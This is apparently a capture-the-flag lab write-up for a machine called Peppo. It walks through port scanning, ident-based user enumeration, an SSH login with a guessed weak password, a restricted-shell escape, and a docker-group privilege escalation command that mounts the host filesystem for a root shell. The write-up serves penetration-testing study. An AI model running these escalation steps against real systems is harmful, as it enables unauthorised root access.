# Peppo

## Nmap

```
sudo nmap 192.168.100.60 -p- -sS -sV

PORT      STATE  SERVICE           VERSION
22/tcp    open   ssh               OpenSSH 7.4p1 Debian 10+deb9u7 (protocol 2.0)
53/tcp    closed domain
113/tcp   open   ident             FreeBSD identd
5432/tcp  open   postgresql        PostgreSQL DB 9.6.0 or later
8080/tcp  open   http              WEBrick httpd 1.4.2 (Ruby 2.6.6 (2020-03-31))
10000/tcp open   snet-sensor-mgmt?
```

As `ident` is running we can use the Perl script `ident-user-enum` to identify which services are running under what user.

![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2Fgit-blob-4f2653b57c82952a7e6a5d237dbd5b8375e869fa%2Fimage.png?alt=media)

Port 10000 reports it is running under the user 'eleanor'. I tried Bruteforcing the username on `SSH` and had no luck. Eventually simply trying `eleanor:elenaor` I was able to login on SSH.

![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2Fgit-blob-14109aff6f377b831d54001d3bf8a0274e0b1494%2Fimage.png?alt=media)

We see from trying the `id` command we are locked in with a restricted bash shell. Checking out our command availability by viewing `$PATH` we can see what binaries we have access to.

![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2Fgit-blob-fa761c917db3614b693f6cfc55badeff4cdb2c9e%2Fimage.png?alt=media)

Checking GTFObins for any of these binaries than can spawn a shell to escape a restricted one:

![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2Fgit-blob-db09b92348595d1be26d3813e601f3867e28f584%2Fimage.png?alt=media)

After running the above command we can export a new path and then spawn a python shell then again export the path to have full functionover the shell session.

```
PATH=/usr/local/sbin:/usr/sbin:/sbin:/usr/local/bin:/usr/bin:/bin
python -c 'import pty; pty.spawn("/bin/bash")'
PATH=/usr/local/sbin:/usr/sbin:/sbin:/usr/local/bin:/usr/bin:/bin
```

![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2Fgit-blob-dd98b7477c6abd3373c8878ad51c3db37d94f602%2Fimage.png?alt=media)

The command `id` shows we are a member of the docker group. GTFObins again shows a method for spawning a root shell when we are a member of the docker group.

![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2Fgit-blob-c1be5c46dcdfdb90150d9ea6c6c328c8614edb86%2Fimage.png?alt=media)

First check what images we have available to us:

```
docker image ls
```

![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2Fgit-blob-efc2518a4bfbd50a685ce6a5dbf8652a50720b38%2Fimage.png?alt=media)

We can use the GTFObins command replacing the value `<alpine>` with one of the images listed above.

```
docker run -v /:/mnt --rm -it redmine chroot /mnt sh
```

Returning a shell as root:

![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2Fgit-blob-9c1d3778e808ece3b949568ee268874afac6afe3%2Fimage.png?alt=media)

{% hint style="success" %}
If you found this page helpful to you, please rate below as per the feedback options. For any corrections or general communications, please see the root page [**Pentest Everything**](https://app.gitbook.com/o/NGHMB2t9fSTAeY25OyP5/s/-MFlgUPYI8q83vG2IJpI/) for contact information.
{% endhint %}